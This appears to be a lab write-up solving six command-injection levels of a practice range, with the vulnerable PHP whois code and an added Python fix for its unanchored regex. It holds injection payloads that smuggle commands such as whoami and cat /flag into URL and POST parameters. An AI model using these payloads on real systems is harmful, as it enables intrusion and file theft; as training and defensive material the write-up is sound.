First level
Append ?cmd=whoami directly to the URL and you can see that the command executes successfully.
The output shows www-data;
This tells you the target is an Ubuntu server, and you can browse the service directories for whatever information you want.
You can also check the version information.
Then check whether there is a flag:
It can be found directly, probably because the first level is relatively simple.
Second level
Same as the previous level, you need to pass a parameter, but this time it is passed via POST.
Third level
This one is not the same as the previous level: there is a whois lookup, so I looked around first.
Append ?domain=baidu.com|whoami to the URL and you can see that the command executes successfully.
Fourth level
Then change the POST body to domain=baidu.com|cat /flag
Fifth level
<?php
// Level 5 source as shown in the challenge. Only $_GET["domain"] is checked;
// $_GET["server"] is concatenated into the command line without any validation.
// The pattern is a single line in the original; the write-up wrapped it. Note that
// the ^ anchor binds only to the first alternative and $ only to the last one,
// so a short alternative such as "com" can match anywhere inside the string.
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|u[agksyz]|v[aceginu]|w[fs]|y[and]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
{
    // Both parameters end up in a shell command string.
    system("whois -h " . $_GET["server"] . " " . $_GET["domain"]);
}
else
{
    echo "malformed domain name";
}
The regular expression here is really long. After studying it, I tried building the payload up layer by layer:
?domain=baidu.com&server=127.0.0.1|whoami||baidu.com
and then:
http://ip/CMD-5/?domain=baidu.com&server=127.0.0.1|cat%20/flag||baidu.com
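The level-5 check fails for two separate reasons: the alternation in the regular expression is not grouped, so ^ and $ apply only to the first and last alternatives, and the server parameter is never validated before it is glued into the command line. The following Python script is an added example (not part of the original write-up or the challenge code) that reproduces the page's regex verbatim, shows that an unanchored alternative matches a string carrying a pipe, and then gives the corrected validator plus a hardened command builder that returns an argv list for subprocess instead of a shell string. The hostname regex for server and the function names are my own assumptions.

```python
import re

# The TLD alternation copied verbatim from the level-5 PHP check.
TLD_ALTERNATIVES = (
    "a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|"
    "e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|"
    "k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|"
    "p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|"
    "u[agksyz]|v[aceginu]|w[fs]|y[and]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|"
    "pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+"
)

# Same shape as the page's pattern: ^[-a-z0-9]+\. is glued to the first alternative
# and $ to the last, so every alternative in between (e.g. "com") matches anywhere.
ORIGINAL_PATTERN = re.compile(r"^[-a-z0-9]+\." + TLD_ALTERNATIVES + r"$")

# Corrected pattern: a non-capturing group makes ^ and $ cover every alternative.
FIXED_PATTERN = re.compile(r"^[-a-z0-9]+\.(?:" + TLD_ALTERNATIVES + r")$")

# Assumed server format: RFC 1123 style hostname labels or a dotted IPv4 literal.
# Shell metacharacters such as '|', ';', '&' and spaces cannot pass this pattern.
SERVER_PATTERN = re.compile(
    r"^[a-z0-9](?:[-a-z0-9]{0,61}[a-z0-9])?(?:\.[a-z0-9](?:[-a-z0-9]{0,61}[a-z0-9])?)*$"
)


def original_accepts(domain: str) -> bool:
    """Mirror preg_match() on the page: an unanchored search with the original regex."""
    return ORIGINAL_PATTERN.search(domain.lower()) is not None


def fixed_accepts(domain: str) -> bool:
    """Same search, but with the whole alternation anchored."""
    return FIXED_PATTERN.search(domain.lower()) is not None


def valid_server(server: str) -> bool:
    """The page never validates 'server'; this is the missing check."""
    return 0 < len(server) <= 253 and SERVER_PATTERN.search(server.lower()) is not None


def build_whois_argv(server: str, domain: str):
    """Return an argv list for whois, or None if either input is rejected.

    Handing a list to subprocess.run() with shell=False means no shell ever parses
    the arguments, which is the hardened counterpart of the page's
    system("whois -h " . $_GET["server"] . " " . $_GET["domain"]).
    """
    if not (valid_server(server) and fixed_accepts(domain)):
        return None
    return ["whois", "-h", server.lower(), domain.lower()]


if __name__ == "__main__":
    # Constructed inputs: the page's benign domain and its level-5 server payload.
    print(original_accepts("baidu.com|whoami"))        # True: 'com' is unanchored
    print(fixed_accepts("baidu.com|whoami"))           # False
    print(build_whois_argv("127.0.0.1|whoami||baidu.com", "baidu.com"))  # None
    print(build_whois_argv("127.0.0.1", "baidu.com"))  # ['whois', '-h', '127.0.0.1', 'baidu.com']
```

The argv list can be passed straight to subprocess.run(argv, capture_output=True, timeout=10); the validation then acts as a second layer rather than the only barrier between user input and a shell.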
Sixth level
Change the GET injection from the fifth level into a POST injection.
That completes the cmd shooting range.